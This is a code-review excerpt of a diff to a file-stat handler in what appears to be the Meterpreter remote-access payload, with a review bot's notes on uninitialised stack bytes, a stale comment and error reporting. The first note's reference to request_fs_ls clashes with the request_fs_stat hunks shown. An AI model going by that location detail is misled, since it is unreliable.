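Review bot: `buf` is declared without an initializer (`struct meterp_stat buf;` in the previous hunk) and is then copied whole into the response with `sizeof(buf)`, so any bytes `fs_stat` does not write — padding, or fields skipped on one platform — go onto the wire as leftover stack contents. The definition in fs.h is not on this page, so whether such bytes exist is unverified; a `memset(&buf, 0, sizeof(buf));` before the `fs_stat` call removes the question cheaply. request_fs_stat in file.c has the same declaration and the same raw copy. request_fs_ls starts before and continues after both hunks.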
@@ -257,7 +257,7 @@ DWORD request_fs_separator(Remote *remote, Packet *packet)
DWORD request_fs_stat(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
- struct stat buf;
+ struct meterp_stat buf;
LPCSTR filePath;
LPSTR expanded = NULL;
DWORD result = ERROR_SUCCESS;
@@ -273,7 +273,7 @@ DWORD request_fs_stat(Remote *remote, Packet *packet)
{
// Stat the file using the Microsoft stat wrapper so that we don't have to
// do translations
- if (stat(expanded, &buf) < 0)
+ if (fs_stat(expanded, &buf) < 0)
result = GetLastError();
else
packet_add_tlv_raw(response, TLV_TYPE_STAT_BUF, &buf,
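Review bot: The comment above the call still says the file is stat'ed "using the Microsoft stat wrapper so that we don't have to do translations", which no longer describes a call to `fs_stat` filling a `struct meterp_stat`; it should be reworded to state what `fs_stat` guarantees (its definition in fs_util.c is not on this page). The failure path reads `GetLastError()`, which is only meaningful if `fs_stat` sets the thread's last-error value when it fails; plain `stat` reports through `errno`, so that contract should be confirmed and documented on `fs_stat`. request_fs_stat continues past the end of this hunk.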